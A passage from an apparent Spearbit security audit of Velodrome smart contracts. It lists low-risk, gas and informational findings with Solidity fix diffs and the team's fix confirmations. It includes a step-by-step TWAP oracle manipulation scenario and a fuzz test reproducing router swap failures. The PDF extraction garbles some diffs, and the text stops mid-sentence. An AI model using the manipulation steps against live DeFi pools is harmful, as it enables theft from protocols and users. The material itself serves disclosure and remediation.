The createGauge() function takes a _gaugeFactory parameter which is checked to be approved by the FactoryRegistry contract. However, the owner of this contract can approve any arbitrary FactoryRegistry contract, hence the return value of the IGaugeFactory(_gaugeFactory).createGauge() call may return an EOA which steals rewards every time notifyRewardAmount() is called. Recommendation: Consider modifying the distribute() function to only approve the available claimable token amount. The createGauge() function should also not approve an infinite amount for any potentially untrusted address. The proposed fix may look like the following: function createGauge( address _pairFactory, address _votingRewardsFactory, address _gaugeFactory, address _pool ) external nonReentrant returns (address) { ... require( IFactoryRegistry(factoryRegistry).isApproved(_pairFactory, _votingRewardsFactory, _gaugeFactory), ,! "Voter: factory path not approved" ); (address _feeVotingReward, address _bribeVotingReward) = ,! IVotingRewardsFactory(_votingRewardsFactory) .createRewards(rewards); address _gauge = IGaugeFactory(_gaugeFactory).createGauge(_pool, _feeVotingReward, rewardToken, ,! isPair); IERC20(rewardToken).approve(_gauge, type(uint256).max); ... - } function distribute(address _gauge) public nonReentrant { IMinter(minter).update_period(); _updateFor(_gauge); // should set claimable to 0 if killed uint256 _claimable = claimable[_gauge]; if (_claimable > IGauge(_gauge).left() && _claimable / DURATION > 0) { claimable[_gauge] = 0; + IERC20(rewardToken).approve(_gauge, _claimable); IGauge(_gauge).notifyRewardAmount(_claimable); emit DistributeReward(_msgSender(), _gauge, _claimable); } } Velodrome: Fixed in commit 6726f2. Spearbit: Verified. 29 +5.4.2 Missing nonReentrant modifier on a state changing checkpoint function Severity: Low Risk Context: VotingEscrow.sol#L802-L804 Description: The checkpoint() function will call the internal _checkpoint() function which ultimately fills the point history and potentially updates the epoch state variable. Recommendation: Add the nonReentrant modifier to the external checkpoint() function. Velodrome: Fixed in commit 9317ea. Spearbit: Verified. +5.4.3 Close to half of the trading fees may be paid one epoch late Severity: Low Risk Context: Gauge.sol#L71 Description: Due to how left() is implemented in Reward (returning the total amount of rewards for the epoch), _claimFees() will not queue rewards until the new fees are greater than the current ones for the epoch. This can cause the check to be false for values that are up to half minus one reward. Consider the following example: • First second of a new epoch, we add 100 rewards. • For the rest of the epoch, we accrue 99.99 rewards. • The check is always false, the 99 rewards will not be added to this epoch, despite having accrued them during this epoch. Recommendation: Document the change or consider always calling notifyRewardAmount() when fees / DU- RATION > 0 I think this issue is a bit challenging to address as fee generation is unpredictable as could be Velodrome: influenced by exogenous factors. In general, bribes and emissions will be fairly consistent on a week-to-week basis, but fees could spike one week (due to a material market event resulting in increased interest) and then decline in other weeks. I think the code as it is helps smooth fees across epochs (as it prevents too many fees from accumulating over a single epoch), so the best we can do is likely document the change. Spearbit: Acknowledged. +5.4.4 Not synced with Epochs Severity: Low Risk Context: Gauge.sol#L209 Description: If there's enough delays in calling the notifyRewardAmount() function, a full desync can happen. Recommendation: It may be ideal to queue rewards to the next epoch to avoid any form of grief/race condition. That said, this may create negative externalities. So perhaps the check could be • If in the first half of the epoch, queue rewards to the current epoch. • If in the second half of the epoch, queue rewards to the next epoch. Velodrome: I am worried about edge cases where a pool may fall into disuse and then be used again. It looks like we can mitigate this by setting periodFinish to the end of the epoch / start of the next epoch. I am aware that this will encourage users calls to Voter.distribute() late but the plan for this function is to automate it so that it is called at the beginning of every epoch. 30 Spearbit: Agree that it makes sense to align periodFinish with the start of the following epoch to avoid any time drift. But I think this change would actually make things more unfair as like what was stated above, users are incentivized to call Voter.distribute() late into the epoch to maximize rewardRate. Velodrome: Voter.distribute() is a target for keeper automation, which will make it less likely that it will be called late. It appears that periodFinish could slightly inflate gauge rewards if the second notifyRewardAmount call is closer to the start of its' relative epoch than the prior notifyRewardAmount. How? • Assume notifyRewardAmount (epoch 1) is called 10 seconds after the start of epoch 1. – periodFinish is now set to 10 seconds after the start of epoch 2 • notifyRewardAmount (epoch 2) is called 1 second after the start of epoch 2 – timestamp < periodFinish by 9 seconds, therefore rewardRate adds the leftover and the amount deposited. I believe what would be best is to always set periodFinish to the epoch start of the next epoch so that this inflation does not happen. Velodrome: Fixed in commit a336f7. Spearbit: Verified. +5.4.5 Dust losses in notifyRewardAmount Severity: Low Risk Context: Gauge.sol#L196 Description: This should cause dust losses which are marginal but are never queued back. See private link to code-423n4/2022-10-3xcalibur-findings#410. Vs SNX implementation which does queue the dust back. Users may be diluted by distributing the _leftover amount of another epoch period of length DURATION if the total supply deposited in the gauge continues to increase over this same period. On the flip side, they may also benefit if users withdraw funds from the gauge during the same epoch. Recommendation: Re-queuing the totalBalance on each notifyRewardAmount should allow re-using those dust amounts. Additionally, these dust amounts are going to be hard to deal with because you may have rewards from older epochs, meaning that re-queuing the balance on the contract would cause a double-spend Napkin math suggests the loss be very marginal assuming: WEEK = 606024*7 GAUGES = 50 GAUGES = 52 WEEK * GAUGES * GAUGES = 1572480000 1572480000 / 1e18 = 1.57248e-7 Velodrome: I was under the impression that re-queueing balanceOf would cause losses as not all emissions will necessarily be claimed. Spearbit: I was under the impression that re-queueing balanceOf would cause losses as not all emissions will necessarily be Yes, that's probably a bigger issue than the marginal rounding Recommend you check dust on a few of the most used gauges, if it's in marginal amounts, it's prob not worth fixing Velodrome: It is difficult to check with the prior gauges as there are always unclaimed rewards, but following the math and given that the token will always be 18 decimals, and the divisor always <= 604800 (seconds in a week), the losses will be minimal. Spearbit: Acknowledged. 31 +5.4.6 All rewards are lost until Gauge or Bribe deposits are non-zero Severity: Low Risk Context: Gauge.sol#L123-L128 Description: Flagging this old finding which is still valid for all SNX like gauges. See private link to code- 423n4/2022-10-3xcalibur-findings#429. Because the rewards are emitted over DURATION, if no deposit has happened and notifyRewardAmount() is called with a non-zero value, all rewards will be forfeited until totalSupply is non-zero as nobody will be able to claim them. Recommendation: Document this risk to end users and tell them to deposit before voting on a gauge. Velodrome: To confirm the issue as I cannot see the findings If a gauge has no LP tokens deposited, and notifyRewardAmount is called with a non-zero value, some amount of tokens will be trapped as no one can claim them. Will add documentation. I think in general users will deposit if there is potential emissions to collect (as the voting occurs in the week prior, and the emissions only get notified the following week). Spearbit: Acknowledged. +5.4.7 Difference in getPastTotalSupply and propose Severity: Low Risk Context: VeloGovernor.sol#L45-L48 Description: The getPastTotalSupply() function currently uses block.number, but OpenZeppelin's propose() function will use votes from block.timestamp - 1 as seen here. This could enable • Front-run and increase total supply to cause proposer to be unable to propose(). • Require higher tokens than expected if total supply can grow within one block. Proposals could be denied as long as a whale is willing to lock more tokens to increase the total supply and thereby increase the proposal threshold. Recommendation: Consider computing total supply and votes values in the same block. Velodrome: Fixed in commit 08c2bcc. Spearbit: Verified. +5.4.8 Delaying update_period may award more emissions Severity: Low Risk Context: Minter.sol#L87 Description: First nudge can be performed on the first tail period, delaying update_period() may award more emissions, because of the possible delay with the first proposal, waiting to call update_period() will allow the use of the updated nudged value. This is marginal (1BPS in difference) Recommendation: Consider documenting this behavior or enforcing a separation between nudge and updated_- period Velodrome: To clarify, the issue is that update_period can be delayed until after nudge, thus allowing for poten- tially more (or less) emissions? Documentation is fine, but I will also note that update_period is a target for keeper automation which should reduce the likelihood of this. 32 Spearbit: Acknowledged. Additionally, you could end up nudgeing before or after calling update_period which would impact 1 BPS in emissions. +5.4.9 Incorrect math for future factories and pools Severity: Low Risk Context: Router.sol#L673-L700 Description: Because quoteLiquidity() assumes an x * y = k formula, its quote value will be incorrect when using a custom factory that uses a different curve. //Router.sol#L673-L700 function _quoteZapLiquidity( address tokenA, address tokenB, bool stable, address _factory, uint256 amountADesired, uint256 amountBDesired, uint256 amountAMin, uint256 amountBMin ) internal view returns (uint256 amountA, uint256 amountB) { require(amountADesired >= amountAMin); require(amountBDesired >= amountBMin); (uint256 reserveA, uint256 reserveB) = getReserves(tokenA, tokenB, stable, _factory); if (reserveA == 0 && reserveB == 0) { (amountA, amountB) = (amountADesired, amountBDesired); } else { uint256 amountBOptimal = quoteLiquidity(amountADesired, reserveA, reserveB); if (amountBOptimal <= amountBDesired) { require(amountBOptimal >= amountBMin, "Router: insufficient B amount"); (amountA, amountB) = (amountADesired, amountBOptimal); } else { uint256 amountAOptimal = quoteLiquidity(amountBDesired, reserveB, reserveA); assert(amountAOptimal <= amountADesired); require(amountAOptimal >= amountAMin, "Router: insufficient A amount"); (amountA, amountB) = (amountAOptimal, amountBDesired); } } } The math may be incorrect for future factories and pools, while the current math is valid for x * y = k, any new AMM math (e.g Bounded / V3 math, Curve V2, Oracle driven AMMs) may turn out to be incorrect. This may cause issues when performing zaps with custom factories. Recommendation: Consider whether custom factories should use zaps and consider extending the code to allow custom factories to specify their own quoteLiquidity() implementation. Velodrome: We are aware of this issue. Future factories will have different parameters for swaps / adding and removing liquidity and will likely require a different router, so a separate router will be created for those. I guess we can make it clearer in the documentation that this will be used exclusively for the current stable/volatile pair implementation. Indeed, the router implementation will evolve based on the pool implementation. I agree that docs should commu- nicate this clearly. Spearbit: Acknowledged. 33 +5.4.10 Add function to remove whitelisted token and NFT Severity: Low Risk Context: Voter.sol Description: In the Voter contract, the governor can only add tokens and NFTs to the whitelist array. However, it is missing the functionality to remove whitelisted tokens and NFTs. If any whitelisted token or NFT has an issue, it cannot be removed from the list. Recommendation: It is recommended to add the remove functionality, which could be done by the following change: - function whitelistToken(address _token) external { + function whitelistToken(address _token, bool _enable) external { require(_msgSender() == governor, "Voter: not governor"); _whitelistToken(_token); _whitelistToken(_token, _enable); - + } - function _whitelistToken(address _token) internal { + function _whitelistToken(address _token, bool _enable) internal { - - - require(!isWhitelistedToken[_token], "Voter: token already whitelisted"); isWhitelistedToken[_token] = true; emit WhitelistToken(_msgSender(), _token); isWhitelistedToken[_token] = _enable; emit WhitelistToken(_msgSender(), _token, _enable); + + } - function whitelistNFT(uint256 _tokenId) external { + function whitelistNFT(uint256 _tokenId, bool _enable) external { address _sender = _msgSender(); require(_sender == governor, "Voter: not governor"); require(!isWhitelistedNFT[_tokenId], "Voter: nft already whitelisted"); isWhitelistedNFT[_tokenId] = true; isWhitelistedNFT[_tokenId] = _enable; emit WhitelistNFT(_sender, _tokenId); emit WhitelistNFT(_sender, _tokenId, _enable); - - + - + } Velodrome: This issue has been fixed in commit 2ace8b. Spearbit: Verified. +5.4.11 Unnecessary approve in Router Severity: Low Risk Context: Router.sol#L656-L657, Router.sol#L712 Description: The newly added Zap feature uses max approvals, which are granted to pairs. However, the Pair contract does not pull tokens from the router, and therefore unnecessarily calls approve() in the router. Because of the possibility of specifying a custom factory, attackers will be able to set up approvals from any token to their contracts. This may be used to scam end-users, for example by performing a swap on these malicious factories. Recommendation: While no attack was identified, the usage of max approvals may be too liberal. A more cautious approach would be to set the allowance to the exact value necessary and then reset it back to 0. Alternatively, do not give any allowance to the pair. 34 Velodrome: Fixed in commit c799c6. Spearbit: Verified. +5.4.12 The current value of a Pair is not always returning a 30-minute TWAP and can be manipulated. Severity: Low Risk Context: Pair.sol#L276-L288 Description: The current function returns a current TWAP. It fetches the last observation and calculates the TWAP between the last observation. The observation is pushed every thirty minutes. However, the interval between current timestamp and the last observation varies a lot. In most cases, the TWAP interval is shorter than 30 minutes. //Pair.sol#L284-L288 uint256 timeElapsed = block.timestamp - _observation.timestamp; @audit: timeElapsed can be much smaller than 30 minutes. uint256 _reserve0 = (reserve0Cumulative - _observation.reserve0Cumulative) / timeElapsed; uint256 _reserve1 = (reserve1Cumulative - _observation.reserve1Cumulative) / timeElapsed; amountOut = _getAmountOut(amountIn, tokenIn, _reserve0, _reserve1); If the last observation is newly updated, the timeElapsed will be much shorter than 30 minutes. The cost of price manipulation is cheaper in this case. Assume the last observation is updated at T. The exploiter can launch an attack at T + 30_MINUTES - 1 1. At T + 30_MINUTES - 1, the exploiter tries to manipulate the price of the pair. Assume the price is moved to 100x. 2. At T + 30_MINUTES, the exploiter pokes the pair. The pair push an observation with the price = 100x. 3. At T + 30_MINUTES + 1, the exploiter tries to exploit external protocols. The current function fetches the It ends up last observation and calculates the TWAP between the last observation and the current price. calculating the two-block-interval TWAP. Recommendation: There are two possible mitigations 1. Check whether external protocols are using the current function. We shall document and inform external protocols of this potential risk. 2. If the current function is not popular, consider removing this function. An alternative solution is a lastTWAP where always calculate the TWAP based on the last two observations. As the time elapsed between two observations is always larger than 30 minutes, the manipulation cost is guaranteed to be high. It's worth mentioning that the cost of multiple blocks MEV and manipulation varies among different chains. The trustworthiness of TWAP relies on the block producer/sequencer, and the mechanism is not transparent on many Layer 2 and alternative Layer 1. Also, two blocks manipulation is believed to be practical on Ethereum. It's likely that all L2 chains will move toward this model. chainsecurity.com/oracle-manipulation-after-merge As a result, it's recommended to be conservative when using a TWAP. Velodrome: I think I am okay with removing current to prevent other protocols from using it inappropriately. Will check with the team. Fixed in commit fc936a. Spearbit: Verified. 35 +5.4.13 Calculation error of getAmountOut leads to revert of Router Severity: Low Risk Context: Pair.sol#L450-L476 Description: The function getAmountOut in Pair calculates the correct swap amount and token price. //Pair.sol#L442-L444 function _f(uint256 x0, uint256 y) internal pure returns (uint256) { return (x0 * ((((y * y) / 1e18) * y) / 1e18)) / 1e18 + (((((x0 * x0) / 1e18) * x0) / 1e18) * y) / ,! 1e18; } //Pair.sol#L450-L476 function _get_y( uint256 x0, uint256 xy, uint256 y ) internal pure returns (uint256) { for (uint256 i = 0; i < 255; i++) { uint256 y_prev = y; uint256 k = _f(x0, y); if (k < xy) { uint256 dy = ((xy - k) * 1e18) / _d(x0, y); y = y + dy; } else { uint256 dy = ((k - xy) * 1e18) / _d(x0, y); y = y - dy; } if (y > y_prev) { if (y - y_prev <= 1) { return y; } } else { if (y_prev - y <= 1) { return y; } } } return y; } The getAmountOut is not always correct. This results in the router unexpectedly revert a regular and correct transaction. We can find one parameter that the router will fail to swap within 5s fuzzing. 36 function testAmountOut(uint swapAmount) public { vm.assume(swapAmount < 1_000_000_000 ether); vm.assume(swapAmount > 1_000_000); uint256 reserve0 = 100 ether; uint256 reserve1 = 100 ether; uint amountIn = swapAmount - swapAmount * 2 / 10000; uint256 amountOut = _getAmountOut(amountIn, token0, reserve0, reserve1); uint initialK = _k(reserve0, reserve1); reserve0 += amountIn; reserve1 -= amountOut; console.log("initial k:", initialK); console.log("curent k:", _k(reserve0, reserve1)); console.log("curent smaller k:", _k(reserve0, reserve1 - 1)); require(initialK < _k(reserve0, reserve1), "K"); require(initialK > _k(reserve0, reserve1-1), "K"); } After the fuzzer have a counter example of swapAmount = 1413611527073436 We can test that the Router will revert if given the fuzzed params. contract PairTest is BaseTest { function testRouterSwapFail() public { Pair pair = Pair(factory.createPair(address(DAI), address(FRAX), true)); DAI.approve(address(router), 100 ether); FRAX.approve(address(router), 100 ether); _addLiquidityToPool( address(this), address(router), address(DAI), address(FRAX), true, 100 ether, 100 ether ); uint swapAmount = 1413611527073436; DAI.approve(address(router), swapAmount); // vm.expectRevert(); console.log("fee:", factory.getFee(address(pair), true)); IRouter.Route[] memory routes = new IRouter.Route[](1); routes[0] = IRouter.Route(address(DAI), address(FRAX), true, address(0)); uint daiAmount = DAI.balanceOf(address(pair)); uint FRAXAmount = FRAX.balanceOf(address(pair)); console.log("daiAmount: ", daiAmount, "FRAXAmount: ", FRAXAmount); vm.expectRevert("Pair: K"); router.swapExactTokensForTokens(swapAmount, 0, routes, address(owner), block.timestamp); } } Recommendation: There are two causes of the miscalculation 1. The function _f gets a different value from _k because of the rounding error. + + + - uint256 _a = (x0 * y) / 1e18; uint256 _b = ((x0 * x0) / 1e18 + (y * y) / 1e18); return (_a * _b) / 1e18; return (x0 * ((((y * y) / 1e18) * y) / 1e18)) / 1e18 + (((((x0 * x0) / 1e18) * x0) / 1e18) * ,! y) / 1e18; 2. dy at Pair.sol#L459 will get screwed by the rounding error. 37 function _get_y( uint256 x0, // @audit (amountIn + reserveA) post reserveA uint256 xy, // k uint256 y // reserveB ) internal view returns (uint256) { for (uint256 i = 0; i < 255; i++) { uint256 y_prev = y; //@audit _f have a different rounding to _k uint256 k = _f(x0, y); if (k < xy) { //@audit: there are two cases where dy == 0 // case 1: The y is converged and we find the correct answer // case 2: _d(x0, y) is too large compare to (xy - k) and the rounding error // // uint256 dy = ((xy - k) * 1e18) / _d(x0, y); if (dy == 0) { screwed us. In this case, we need to increase y by 1 if (k == xy ) { // We found the correct answer. Return y return y; } if (_k(x0, y + 1) > xy) { // If _k(x0, y + 1) > xy, then we are close to the correct answer. // There's no closer answer than y + 1 return y + 1; } dy = 1; } y = y + dy; } else { uint256 dy = ((k - xy) * 1e18) / _d(x0, y); if (dy == 0) { if (k == xy || _f(x0, y - 1) < xy) { // Likewise, if k == xy, we found the correct answer. // If _f(x0, y - 1) < xy, then we are close to the correct answer. // There's no closer answer than "y" // It's worth mentioning that we need to find y where f(x0, y) >= xy // As a result, we can't return y - 1 even it's closer to the correct answer return y; } dy = 1; } y = y - dy; } } // @audit - should never happen. If it does, it means it doesn't converge for 255 iterations // @audit - should assign a custom error to save gas. revert("y not found"); } Velodrome: I have reviewed this and I agree with the finding. We can fix it for the new Pair contracts but note that like the "current value of a Pair is not always returning a 30-minute TWAP and can be manipulated" issue, it will only be fixed for new Pair contracts, while old Pair contracts will continue to have the faulty code in it. Fixed in commit 9ca981. Spearbit: Verified. 38 +5.4.14 VotingEscrow checkpoints is not synchronized Severity: Low Risk Context: VotingEscrow.sol#L1309-L1351, VotingEscrow.sol#L1364-L1415 Description: Delegating token ids is not synchronizing correctly fromBlock variable in the checkpoint, by leaving it not updated the functions getPastVotesIndex and _findWhatCheckpointToWrite could return the incorrect index. Recommendation: It is recommended to update the fromBlock variable of checkpoint in functions _moveTok- enDelegates and _moveAllDelegates Velodrome: Fixed in commit a670bf. Spearbit: Verified. +5.4.15 Wrong proposal expected value in VeloGovernor Severity: Low Risk Context: VeloGovernor.sol#L14-L16 Description: The expected values of MAX_PROPOSAL_NUMERATOR and proposalNumerator are incorrect, in the current implementation max proposal is set to 0.5%, the expected value is 5%, and the proposal numerator starts at 0.02%, and not at 0.2% as expected. Recommendation: It is recommended to fix the value to - uint256 public constant MAX_PROPOSAL_NUMERATOR = 50; // max 5% + uint256 public constant MAX_PROPOSAL_NUMERATOR = 500; // max 5% uint256 public constant PROPOSAL_DENOMINATOR = 10_000; - uint256 public proposalNumerator = 20; // start at 0.02% + uint256 public proposalNumerator = 2; // start at 0.02% Velodrome: Fixed as part of this commit 64fe60. Spearbit: Verified. +5.4.16 _burn function will always revert if the caller is the approved spender Severity: Low Risk Context: VotingEscrow.sol#L556 Description: The owner or the approved spender is allowed to trigger the _burn function. However, whenever an approved spender triggers this function, it will always revert. This is because the _removeTokenFrom function will revert internally if the caller is not the owner of the NFT as shown below. function _removeTokenFrom(address _from, uint256 _tokenId) internal { // Throws if `_from` is not the current owner assert(idToOwner[_tokenId] == _from); As a result, an approved spender will not be able to withdraw or merge a veNFT on behalf of the owner because the internal _burn function will always revert. Recommendation: Update the _burn function to pass the owner's address instead of the caller's address to the _removeTokenFrom function 39 function _burn(uint256 _tokenId) internal { require(_isApprovedOrOwner(msg.sender, _tokenId), "VotingEscrow: caller is not owner nor approved"); address owner = ownerOf(_tokenId); ..SNIP.. // Remove token _removeTokenFrom(msg.sender, _tokenId); _removeTokenFrom(owner, _tokenId); emit Transfer(owner, address(0), _tokenId); - + } Velodrome: Fixed in commit 7d5a78. Spearbit: Verified. 5.5 Gas Optimization +5.5.1 OpenZeppelin's Clones library can be used to cheaply deploy rewards contracts Severity: Gas Optimization Context: VotingRewardsFactory.sol, ManagedRewardsFactory.sol, PairFactory.sol#L153, GaugeFactory.sol Description: OpenZeppelin's Clones library allows for significant gas savings when there are multiple deploy- ments of the same family of contracts. This would prove useful in several factory contracts which commonly deploy the same type of contract. Minimal proxies make use of the same code even when initialization data may be different for each instance. By pointing to an implementation contract, we can delegate all calls to a fixed address and minimise deployment costs. Recommendation: Consider making use of this library in any of the factory contracts. Velodrome: At this stage, we will make this change for the Pair contract as it appears to get the most benefit. For other contracts, we will consider it but it is a low priority. Fix for pairs in commit cd4698. Spearbit: Verified. +5.5.2 VelodromeTimeLibrary functions can be made unchecked Severity: Gas Optimization Context: VelodrometimeLibrary.sol#L7-L14 Description: Running the following fuzz test pragma solidity 0.8.13; import "forge-std/Test.sol"; contract VelodromeTimeLibrary { uint256 public constant WEEK = 7 days; /// @dev Returns start of epoch based on current timestamp function epochStart(uint256 timestamp) public pure returns (uint256) { unchecked { return timestamp - (timestamp % WEEK); } } /// @dev Returns unrestricted voting window function epochEnd(uint256 timestamp) public pure returns (uint256) { unchecked { 40 return timestamp - (timestamp % WEEK) + WEEK - 1 hours; } } } contract VelodromeTimeLibraryTest is Test { VelodromeTimeLibrary vtl; uint256 public constant WEEK = 7 days; function setUp() public { vtl = new VelodromeTimeLibrary(); } function testEpochStart(uint256 timestamp) public { uint256 uncheckedVal = uint256 normalVal = timestamp - (timestamp % WEEK); assertEq(uncheckedVal, normalVal); vtl.epochStart(timestamp); } function testEpochEnd(uint256 timestamp) public { uint256 uncheckedVal = vtl.epochEnd(timestamp); uint256 normalVal = timestamp - (timestamp % WEEK) + WEEK - 1 hours; assertEq(uncheckedVal, normalVal); } } One can see that both VelodromeTimeLibrary functions will only start to overflow at a ridiculously high timestamp input. Recommendation: With that in mind it would be safe to consider making both VelodromeTimeLibrary functions unchecked. Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. +5.5.3 Skip call can save gas Severity: Gas Optimization Context: Voter.sol#L430-L434 Description: distribute(address[] memory _gauges) is meant to be used for multiple gauges but it calls minter.update_period before each call to notifyRewardAmount Recommendation: By refactoring to call update_period only once, you can save at least 200 gas per additional gauge in the list. distribute(address _gauge) exists in the case there are too many gauges where Velodrome: distribute(address[] memory _gauges) would run out of gas when distributing to all gauges at once. However, I do believe distribute(address _gauge) can be turned internal where distribute(address[] memory _gauges) only calls update_period() once before the looped call of distribute(). Spearbit: Acknowledged. 41 +5.5.4 Change to zero assignment to save gas Severity: Gas Optimization Context: Voter.sol#L141 Description: It is not necessary to subtract the total value from the votes instead you should set it directly to zero. Recommendation: It is recommended to set votes to zero - votes[_tokenId][_pool] -= _votes; + delete votes[_tokenId][_pool]; Velodrome: Fixed in commit 111d83. Spearbit: Verified. +5.5.5 Refactor to skip an SLOAD Severity: Gas Optimization Context: VotingEscrow.sol#L831-L832 Description: It is possible to skip an SLOAD by refactoring the code as it is in recommendation. Recommendation: It is recommended to change the addition of tokenId to - ++tokenId; - uint256 _tokenId = tokenId; + uint256 _tokenId = ++tokenId; Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. +5.5.6 Tail variable can be removed to save gas Severity: Gas Optimization Context: Minter.sol#L43 Description: It is possible to save gas by freeing the tail slot, which can be replaced by check weekly < TAIL_- START Recommendation: You can replace the tail variable by using the check - bool public tail; function nudge() external { ... - + require(tail, "Minter: not in tail emissions yet"); require(weekly < TAIL_START, "Minter: not in tail emissions yet"); ... } function update_period() external returns (uint256 _period) { ... - + bool _tail = tail; bool _tail = weekly < TAIL_START; ... } Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. 42 +5.5.7 Use a bitmap to store nudge proposals for each epoch Severity: Gas Optimization Context: Minter.sol#L41 Description: The usage of a bitmap implementation for boolean values can save a significant amount of gas. The proposals variable can be indexed by each epoch which should only increment once per week. Recommendation: Consider making use of a bitmap implementation to efficiently pack boolean values. Velodrome: Addressed. Spearbit: The team created a PR to implement the suggestion. +5.5.8 isApproved function optimization Severity: Gas Optimization Context: FactoryRegistry.sol#L63-L69 Description: Because settings are all known, you could do an if-check in memory rather than in storage, by validating first the fallback settings. The recommended implementation will become cheaper for the base case, negligibly more expensive in other cases ~10s of gas Recommendation: Change isApproved function to follow function isApproved( address pairFactory, address votingRewardsFactory, address gaugeFactory ) external view returns (bool) { if ((pairFactory == fallbackPairFactory) && (votingRewardsFactory == fallbackVotingRewardsFactory) && (gaugeFactory == fallbackGaugeFactory) { return true; } return _approved[pairFactory][votingRewardsFactory][gaugeFactory]; + + + + + } By doing this change this check would also be redundant function unapprove( address pairFactory, address votingRewardsFactory, address gaugeFactory ) external onlyOwner { require(_approved[pairFactory][votingRewardsFactory][gaugeFactory], "FactoryRegistry: not approved"); - require( - - - - - ); !((pairFactory == fallbackPairFactory) && (votingRewardsFactory == fallbackVotingRewardsFactory) && (gaugeFactory == fallbackGaugeFactory)), "FactoryRegistry: Cannot delete the fallback route" delete _approved[pairFactory][votingRewardsFactory][gaugeFactory]; emit Unapprove(pairFactory, votingRewardsFactory, gaugeFactory); } Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. 43 +5.5.9 Use calldata instead of memory to save gas Severity: Gas Optimization Context: VotingRewardsFactory.sol#L9, Voter.sol#L96 Description: Using calldata avoids copying the value into memory, reducing gas cost Recommendation: Change function variables array from memory to calldata //VotingRewardsFactory - function createRewards(address[] memory rewards) + function createRewards(address[] calldata rewards) //Voter - function initialize(address[] memory _tokens, address _minter) external { + function initialize(address[] calldata _tokens, address _minter) external { Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. +5.5.10 Cache store variables when used multiple times Severity: Gas Optimization Context: SinkManager.sol Description: Storage loads are very expensive compared to memory loads, storage values that are read multiple times should be cached avoiding multiple storage loads. In SinkManager contract use multiple times the storage variable ownedTokenId Recommendation: Cache storage variables that are used multiple times: function convertVELO(uint256 amount) external { + uint256 _ownedTokenId = ownedTokenId; - + require(ownedTokenId != 0, "SinkManager: tokenId not set"); require(_ownedTokenId != 0, "SinkManager: tokenId not set"); ... ve.increase_amount(ownedTokenId, amount); ve.increase_amount(_ownedTokenId, amount); - + } ... Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. +5.5.11 Add immutable to variable that don't change Severity: Gas Optimization Context: SinkConverter.sol#L13-L15, SinkManager.sol#L31-L40, FactoryRegistry.sol#L16-L18, Gauge.sol#L24 Description: Using immutable for variables that do not changes helps to save on gas used. The reason has been that immutable variables do not occupy a storage slot when compiled, they are saved inside the contract byte code. Recommendation: Add immutable keyword for each one of the variables in context Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. 44 +5.5.12 Use Custom Errors Severity: Gas Optimization Context: Across All Contracts Description: As one can see here: "there is a convenient and gas-efficient way to explain to users why an operation failed through the use of custom errors. Until now, you could already use strings to give more information about failures (e.g., revert("Insufficient funds.");), but they are rather expensive, especially when it comes to deploy cost, and it is difficult to use dynamic information in them." Recommendation: Consider using Custom Errors instead of using error strings, to reduce deployment and run- time cost. This would save both deployment and runtime cost. Velodrome: Partially addressed in commit 9b1f6e for the main contracts. Spearbit: Verified. +5.5.13 Cache array length outside of loop Severity: Gas Optimization Context: Pair.sol#L298, RewardsDistributor.sol#L289, Router.sol#L122, Router.sol#L401, Router.sol#L491, Router.sol#L531, Voter.sol#L385, VotingEscrow.sol#L1293, Voter.sol#L397, VotingEscrow.sol#L1323, VotingEscrow.sol#L1402, GovernorSimple.sol#L336, GovernorSimple.sol#L353, Reward.sol#L237, VotingReward.sol#L11 Voter.sol#L98, Voter.sol#L431, VotingEscrow.sol#L1342, Voter.sol#L335, VotingEscrow.sol#L1242, VotingEscrow.sol#L1379, Router.sol#L549, Voter.sol#L403, Voter.sol#L373, Description: If not cached, the solidity compiler will always read the length of the array during each iteration. That is, if it is a storage array, this is an extra sload operation (100 additional extra gas for each iteration except for the first) and if it is a memory array, this is an extra mload operation (3 additional gas for each iteration except for the first). Recommendation: variable.length. Then add length in place of variable.length in the for loop. Consider simply doing something like so before the for loop: uint length = Velodrome: Fixed in commit eb7f0e. Spearbit: Verified. 5.6 Informational +5.6.1 Withdrawing from a managed veNFT locks the user's veNFT for the maximum amount of time Severity: Informational Context: VotingEscrow.sol#L177-L186 Description: A user may deposit their veNFT through the depositManaged() function with any unlock time value. However, upon withdrawing, the unlock time is automatically configured to (block.timestamp + MAXTIME / WEEK) * WEEK. This is poor UX and it does not give users much control over the expiry time of their veNFT. Recommendation: While this may be an intentional design decision, it does not give users much autonomy over their own veNFT after depositing into a managed veNFT. Ensure this is documented and well-understood by all users interacting with the managed veNFT mechanism. Velodrome: This is an intentional design decision and will be made explicit to users in the interface prior to interacting with managed NFTs. Added comments in commit eb7f0e. Spearbit: Acknowledged. 45 +5.6.2 veNFT split functionality can not be disabled Severity: Informational Context: VotingEscrow.sol#L1186-L1189 Description: Once split functionality has been enabled via the enableSplitForAll(), it is not possible to disable this feature in the future. It does not pose any additional risk to have it disabled once users have already split their veNFTs because the protocol allows for these locked amounts to be readily withdrawn upon expiry. Recommendation: Ensure this is documented or consider adding a disableSplitForAll() function, callable only by the Velodrome team. Velodrome: Fixed in commit 927cdb. Spearbit: Verified. +5.6.3 Anyone can notify the FeesVotingReward contract of new rewards Severity: Informational Context: Gauge.sol#L62-L88, BribeVotingReward.sol, Voter.sol#L274-L277 Description: While the BribeVotingReward contract intends to allow bribes from anyone, the FeesVotingReward contract is designed to receive fees from just the Gauge contract. This is inconsistent with other reward contracts like LockedManagedReward. Recommendation: Ensure this is acceptable behaviour and consider documenting this within FeesVotingReward. Alternatively, it may be worthwhile restricting the notifyRewardAmount() function to be callable only from the Gauge contract. Velodrome: I think in line with making permissions as restrictive as possible, we can go with restricting notifyRe- wardAmount for FeesVotingReward to the gauge only. Something like require(IVoter(voter).gaugeToFees(sender) == address(this)); Velodrome: Fixed in commit 8de67e. Spearbit: Verified. +5.6.4 Missing check in merge if the _to NFT has voted Severity: Informational Context: VotingEscrow.sol#L1130 Description: The merge() function is used to combine a _from VeNFT into a _to veNFT. It starts with a check on if the _from VeNFT has voted or not. However, it doesn't check if the _to VeNFT has voted or not. This will cause the user to have less voting power, leaving rewards and/or emissions on the table, if they don't call poke() || reset(). Although this would only be an issue for an unaware user. An aware user would still have to waste gas on either of the following: 1. An extra call to poke() || reset(). 2. Vote with the _to veNFT and then call merge(). Recommendation: Consider adding the following check: require(!voted[_to], "VotingEscrow: voted"); Velodrome: This is a known issue. We removed the 